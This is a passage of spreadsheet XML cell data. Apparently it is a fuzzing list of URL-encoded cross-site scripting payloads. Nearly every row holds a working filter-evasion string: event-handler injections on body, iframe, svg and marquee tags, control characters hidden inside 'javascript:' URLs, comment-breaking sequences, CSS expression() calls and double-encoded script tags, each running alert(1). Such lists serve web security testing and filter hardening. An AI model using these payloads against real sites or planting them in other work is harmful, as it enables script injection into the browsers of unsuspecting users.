        <v>%3Cstyle%20onLoad%20style%20onLoad%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fstyle%20onLoad%3E</v>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="3" t="s">
        <v>59</v>
      </c>
      <c r="B49" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20onReadyStateChange%20iframe%20onReadyStateChange%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fiframe%20onReadyStateChange%3E</v>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="3" t="s">
        <v>60</v>
      </c>
      <c r="B50" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onPageShow%20body%20onPageShow%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onPageShow%3E</v>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="3" t="s">
        <v>61</v>
      </c>
      <c r="B51" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%20onReadyStateChange%20style%20onReadyStateChange%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fstyle%20onReadyStateChange%3E</v>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="3" t="s">
        <v>62</v>
      </c>
      <c r="B52" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cframeset%20onFocus%20frameset%20onFocus%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fframeset%20onFocus%3E</v>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="3" t="s">
        <v>63</v>
      </c>
      <c r="B53" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Capplet%20onError%20applet%20onError%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fapplet%20onError%3E</v>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="3" t="s">
        <v>64</v>
      </c>
      <c r="B54" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmarquee%20onStart%20marquee%20onStart%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fmarquee%20onStart%3E</v>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="3" t="s">
        <v>65</v>
      </c>
      <c r="B55" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20onLoad%20script%20onLoad%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fscript%20onLoad%3E</v>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="3" t="s">
        <v>66</v>
      </c>
      <c r="B56" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onMouseOver%20html%20onMouseOver%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onMouseOver%3E</v>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="3" t="s">
        <v>67</v>
      </c>
      <c r="B57" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onMouseEnter%20html%20onMouseEnter%3D%22javascript%3Aparent.javascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onMouseEnter%3E</v>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="3" t="s">
        <v>68</v>
      </c>
      <c r="B58" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onBeforeUnload%20body%20onBeforeUnload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onBeforeUnload%3E</v>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="3" t="s">
        <v>69</v>
      </c>
      <c r="B59" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onMouseDown%20html%20onMouseDown%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onMouseDown%3E</v>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="3" t="s">
        <v>70</v>
      </c>
      <c r="B60" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmarquee%20onScroll%20marquee%20onScroll%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fmarquee%20onScroll%3E</v>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="3" t="s">
        <v>71</v>
      </c>
      <c r="B61" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxml%20onPropertyChange%20xml%20onPropertyChange%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fxml%20onPropertyChange%3E</v>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="3" t="s">
        <v>72</v>
      </c>
      <c r="B62" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cframeset%20onBlur%20frameset%20onBlur%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fframeset%20onBlur%3E</v>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="3" t="s">
        <v>73</v>
      </c>
      <c r="B63" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Capplet%20onReadyStateChange%20applet%20onReadyStateChange%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fapplet%20onReadyStateChange%3E</v>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="3" t="s">
        <v>74</v>
      </c>
      <c r="B64" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%20onUnload%20svg%20onUnload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fsvg%20onUnload%3E</v>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="3" t="s">
        <v>75</v>
      </c>
      <c r="B65" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onMouseOut%20html%20onMouseOut%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onMouseOut%3E</v>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="3" t="s">
        <v>76</v>
      </c>
      <c r="B66" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onMouseMove%20body%20onMouseMove%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onMouseMove%3E</v>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="3" t="s">
        <v>77</v>
      </c>
      <c r="B67" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onResize%20body%20onResize%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onResize%3E</v>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="3" t="s">
        <v>78</v>
      </c>
      <c r="B68" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20onError%20object%20onError%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fobject%20onError%3E</v>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="3" t="s">
        <v>79</v>
      </c>
      <c r="B69" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onPopState%20body%20onPopState%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onPopState%3E</v>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="3" t="s">
        <v>80</v>
      </c>
      <c r="B70" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onMouseMove%20html%20onMouseMove%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onMouseMove%3E</v>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="3" t="s">
        <v>81</v>
      </c>
      <c r="B71" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Capplet%20onreadystatechange%20applet%20onreadystatechange%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fapplet%20onreadystatechange%3E</v>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="3" t="s">
        <v>82</v>
      </c>
      <c r="B72" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onpagehide%20body%20onpagehide%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onpagehide%3E</v>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="3" t="s">
        <v>83</v>
      </c>
      <c r="B73" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%20onunload%20svg%20onunload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fsvg%20onunload%3E</v>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="3" t="s">
        <v>84</v>
      </c>
      <c r="B74" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Capplet%20onerror%20applet%20onerror%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fapplet%20onerror%3E</v>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="3" t="s">
        <v>85</v>
      </c>
      <c r="B75" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onkeyup%20body%20onkeyup%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onkeyup%3E</v>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="3" t="s">
        <v>86</v>
      </c>
      <c r="B76" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onunload%20body%20onunload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onunload%3E</v>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="3" t="s">
        <v>87</v>
      </c>
      <c r="B77" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20onload%20iframe%20onload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fiframe%20onload%3E</v>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="3" t="s">
        <v>88</v>
      </c>
      <c r="B78" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onload%20body%20onload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onload%3E</v>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="3" t="s">
        <v>89</v>
      </c>
      <c r="B79" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onmouseover%20html%20onmouseover%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onmouseover%3E</v>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="3" t="s">
        <v>90</v>
      </c>
      <c r="B80" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20onbeforeload%20object%20onbeforeload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fobject%20onbeforeload%3E</v>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="3" t="s">
        <v>91</v>
      </c>
      <c r="B81" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onbeforeunload%20body%20onbeforeunload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onbeforeunload%3E</v>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="3" t="s">
        <v>92</v>
      </c>
      <c r="B82" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onfocus%20body%20onfocus%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onfocus%3E</v>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="3" t="s">
        <v>93</v>
      </c>
      <c r="B83" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onkeydown%20body%20onkeydown%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onkeydown%3E</v>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="3" t="s">
        <v>94</v>
      </c>
      <c r="B84" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20onbeforeload%20iframe%20onbeforeload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fiframe%20onbeforeload%3E</v>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="3" t="s">
        <v>95</v>
      </c>
      <c r="B85" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%20iframe%20src%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fiframe%20src%3E</v>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="3" t="s">
        <v>96</v>
      </c>
      <c r="B86" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%20onload%20svg%20onload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fsvg%20onload%3E</v>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="3" t="s">
        <v>97</v>
      </c>
      <c r="B87" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onmousemove%20html%20onmousemove%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onmousemove%3E</v>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="3" t="s">
        <v>98</v>
      </c>
      <c r="B88" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onblur%20body%20onblur%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onblur%3E</v>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="3" t="s">
        <v>99</v>
      </c>
      <c r="B89" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5Cx3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="s">
        <v>100</v>
      </c>
      <c r="B90" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%22%60%3E%3Cscript%3E%2F%2A%20%2A%5Cx2Fjavascript%3Aalert%281%29%2F%2F%20%2A%2F%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="3" t="s">
        <v>101</v>
      </c>
      <c r="B91" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%5Cx0D</v>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="3" t="s">
        <v>102</v>
      </c>
      <c r="B92" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%5Cx0A</v>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="3" t="s">
        <v>103</v>
      </c>
      <c r="B93" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%5Cx0B</v>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="3" t="s">
        <v>104</v>
      </c>
      <c r="B94" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20charset%3D%22%5Cx22%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="3" t="s">
        <v>105</v>
      </c>
      <c r="B95" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%5Cx3E%3Cimg%20src%3Dxxx%3Ax%20onerror%3Djavascript%3Aalert%281%29%3E%20--%3E</v>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="3" t="s">
        <v>106</v>
      </c>
      <c r="B96" s="4" t="str">
        <f t="shared" si="1"/>
        <v>--%3E%3C%21--%20---%3E%20%3Cimg%20src%3Dxxx%3Ax%20onerror%3Djavascript%3Aalert%281%29%3E%20--%3E</v>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="3" t="s">
        <v>107</v>
      </c>
      <c r="B97" s="4" t="str">
        <f t="shared" si="1"/>
        <v>--%3E%3C%21--%20--%5Cx00%3E%20%3Cimg%20src%3Dxxx%3Ax%20onerror%3Djavascript%3Aalert%281%29%3E%20--%3E</v>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="3" t="s">
        <v>108</v>
      </c>
      <c r="B98" s="4" t="str">
        <f t="shared" si="1"/>
        <v>--%3E%3C%21--%20--%5Cx21%3E%20%3Cimg%20src%3Dxxx%3Ax%20onerror%3Djavascript%3Aalert%281%29%3E%20--%3E</v>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="3" t="s">
        <v>109</v>
      </c>
      <c r="B99" s="4" t="str">
        <f t="shared" si="1"/>
        <v>--%3E%3C%21--%20--%5Cx3E%3E%20%3Cimg%20src%3Dxxx%3Ax%20onerror%3Djavascript%3Aalert%281%29%3E%20--%3E</v>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="3" t="s">
        <v>110</v>
      </c>
      <c r="B100" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3D%27%23%5Cx27%20onerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="3" t="s">
        <v>111</v>
      </c>
      <c r="B101" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%5Cx3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="s">
        <v>112</v>
      </c>
      <c r="B102" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%3E%3Cp%3E%3Csvg%3E%3Cscript%3Ea%3D%27hello%5Cx27%3Bjavascript%3Aalert%281%29%2F%2F%27%3B%3C%2Fscript%3E%3C%2Fp%3E%3Ca%20href%3Djavas%5Cx00cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="3" t="s">
        <v>113</v>
      </c>
      <c r="B103" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx07cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="3" t="s">
        <v>114</v>
      </c>
      <c r="B104" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx0Dcript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="3" t="s">
        <v>115</v>
      </c>
      <c r="B105" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx0Acript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="3" t="s">
        <v>116</v>
      </c>
      <c r="B106" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx08cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="3" t="s">
        <v>117</v>
      </c>
      <c r="B107" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx02cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="3" t="s">
        <v>118</v>
      </c>
      <c r="B108" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx03cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="3" t="s">
        <v>119</v>
      </c>
      <c r="B109" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx04cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="3" t="s">
        <v>120</v>
      </c>
      <c r="B110" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx01cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="3" t="s">
        <v>121</v>
      </c>
      <c r="B111" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx05cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="3" t="s">
        <v>122</v>
      </c>
      <c r="B112" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx0Bcript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="3" t="s">
        <v>123</v>
      </c>
      <c r="B113" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx09cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="3" t="s">
        <v>124</v>
      </c>
      <c r="B114" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx06cript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="3" t="s">
        <v>125</v>
      </c>
      <c r="B115" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javas%5Cx0Ccript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="3" t="s">
        <v>126</v>
      </c>
      <c r="B116" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%2F%2A%20%2A%5Cx2A%2Fjavascript%3Aalert%281%29%2F%2F%20%2A%2F%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="3" t="s">
        <v>127</v>
      </c>
      <c r="B117" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%2F%2A%20%2A%5Cx00%2Fjavascript%3Aalert%281%29%2F%2F%20%2A%2F%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="3" t="s">
        <v>128</v>
      </c>
      <c r="B118" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3C%2Fstyle%5Cx3E%3Cimg%20src%3D%22about%3Ablank%22%20onerror%3Djavascript%3Aalert%281%29%2F%2F%3E%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="3" t="s">
        <v>129</v>
      </c>
      <c r="B119" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3C%2Fstyle%5Cx0D%3Cimg%20src%3D%22about%3Ablank%22%20onerror%3Djavascript%3Aalert%281%29%2F%2F%3E%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="3" t="s">
        <v>130</v>
      </c>
      <c r="B120" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3C%2Fstyle%5Cx09%3Cimg%20src%3D%22about%3Ablank%22%20onerror%3Djavascript%3Aalert%281%29%2F%2F%3E%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="3" t="s">
        <v>131</v>
      </c>
      <c r="B121" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3C%2Fstyle%5Cx20%3Cimg%20src%3D%22about%3Ablank%22%20onerror%3Djavascript%3Aalert%281%29%2F%2F%3E%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="3" t="s">
        <v>132</v>
      </c>
      <c r="B122" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3C%2Fstyle%5Cx0A%3Cimg%20src%3D%22about%3Ablank%22%20onerror%3Djavascript%3Aalert%281%29%2F%2F%3E%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="s">
        <v>133</v>
      </c>
      <c r="B123" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%3EABC%3Cdiv%20style%3Dfont-family%3A%27foo%27%5Cx7Dx%3Aexpression%28javascript%3Aalert%281%29%3B%2F%2A%27%3B%22%3EDEF</v>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="s">
        <v>134</v>
      </c>
      <c r="B124" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%3EABC%3Cdiv%20style%3Dfont-family%3A%27foo%27%5Cx3Bx%3Aexpression%28javascript%3Aalert%281%29%3B%2F%2A%27%3B%22%3EDEF</v>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="3" t="s">
        <v>135</v>
      </c>
      <c r="B125" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%25253Cscript%25253Ealert%28%27XSS%27%29%25253C%25252Fscript%25253E</v>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="3" t="s">
        <v>136</v>
      </c>
      <c r="B126" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Eif%28%22x%5C%5CxE1%5Cx96%5Cx89%22.length%3D%3D2%29%20%7B%20javascript%3Aalert%281%29%3B%7D%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="3" t="s">
        <v>137</v>
      </c>
      <c r="B127" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Eif%28%22x%5C%5CxE0%5CxB9%5Cx92%22.length%3D%3D2%29%20%7B%20javascript%3Aalert%281%29%3B%7D%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="3" t="s">
        <v>138</v>
      </c>
      <c r="B128" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Eif%28%22x%5C%5CxEE%5CxA9%5Cx93%22.length%3D%3D2%29%20%7B%20javascript%3Aalert%281%29%3B%7D%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="s">
        <v>32</v>
      </c>
      <c r="B129" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%3E%3C%5Cx3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="s">
        <v>33</v>
      </c>
      <c r="B130" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%3E%3C%5Cx00script%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="s">
        <v>139</v>
      </c>
      <c r="B131" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%3E%3C%5Cx3Cimg%20src%3Dxxx%3Ax%20onerror%3Djavascript%3Aalert%281%29%3E%27%60%3E%3C%5Cx00img%20src%3Dxxx%3Ax%20onerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="3" t="s">
        <v>140</v>
      </c>
      <c r="B132" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22data%3Atext%2Fplain%5Cx2Cjavascript%3Aalert%281%29%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="3" t="s">
        <v>141</v>
      </c>
      <c r="B133" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22data%3A%5CxD4%5Cx8F%2Cjavascript%3Aalert%281%29%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="3" t="s">
        <v>142</v>
      </c>
      <c r="B134" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22data%3A%5CxE0%5CxA4%5Cx98%2Cjavascript%3Aalert%281%29%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="3" t="s">
        <v>143</v>
      </c>
      <c r="B135" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22data%3A%5CxCB%5Cx8F%2Cjavascript%3Aalert%281%29%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="3" t="s">
        <v>24</v>
      </c>
      <c r="B136" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx20type%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="3" t="s">
        <v>26</v>
      </c>
      <c r="B137" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx3Etype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="3" t="s">
        <v>27</v>
      </c>
      <c r="B138" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx0Dtype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="3" t="s">
        <v>28</v>
      </c>
      <c r="B139" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx09type%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="3" t="s">
        <v>29</v>
      </c>
      <c r="B140" s="4" t="str">
        <f t="shared" si="1"/>
